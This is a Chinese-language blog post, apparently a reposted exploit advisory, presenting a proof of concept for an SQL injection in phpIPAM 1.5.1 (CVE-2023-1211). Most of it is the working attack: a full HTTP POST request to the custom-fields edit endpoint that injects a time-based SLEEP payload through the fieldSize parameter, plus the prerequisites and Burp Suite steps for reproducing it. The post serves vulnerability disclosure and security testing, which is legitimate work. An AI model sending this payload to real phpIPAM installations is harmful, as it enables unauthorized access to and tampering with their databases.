phpIPAM 1.5.1 SQL注入漏洞技术详解

本文详细分析了phpIPAM 1.5.1版本中存在的SQL注入漏洞(CVE-2023-1211),提供了完整的漏洞原理、利用步骤和PoC代码,涉及Web应用程序安全测试技术。

漏洞标题: phpIPAM 1.5.1 - SQL注入

日期: 2025-11-25

漏洞作者: CodeSecLab

厂商主页: https://github.com/phpipam/phpipam/

软件链接: https://github.com/phpipam/phpipam/

版本: 1.5.1

测试环境: Windows

CVE编号: CVE-2023-1211

漏洞证明

1
2
3
4
5
6
POST /app/admin/custom-fields/edit-result.php HTTP/1.1
Host: phpipam
Cookie: PHPSESSID=<valid_session_id>; csrf_cookie=<valid_csrf_token>
Content-Type: application/x-www-form-urlencoded

csrf_cookie=<valid_csrf_token>&action=add&name=custom_sqli_test&fieldType=enum&fieldSize=0)%3B+SELECT+SLEEP(10)%3B+--+&table=devices&Comment=sql_poc&NULL=YES

前提条件:

  1. 有效的身份验证会话(PHPSESSID cookie)
  2. 有效的CSRF令牌(首先从/admin/custom-fields/页面获取)
  3. 目标表必须存在(使用默认的’devices’表)
  4. 字段类型必须是enum/set才能到达易受攻击的代码路径

手动测试步骤:

  1. 登录到phpIPAM
  2. 访问/admin/custom-fields/获取CSRF令牌
  3. 使用上述payload发送POST请求

注意:<valid_session_id><valid_csrf_token>替换为身份验证会话中的实际值。fieldSize参数通过enum/set类型定义上下文注入SQL。

重现步骤

  1. 以管理员用户身份登录。
  2. 使用Burp Suite等Web代理工具拦截并发送恶意请求,确保包含有效的会话cookie和CSRF令牌。
  3. 观察结果

标签

SQL注入、Web应用程序、PHP、安全漏洞

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计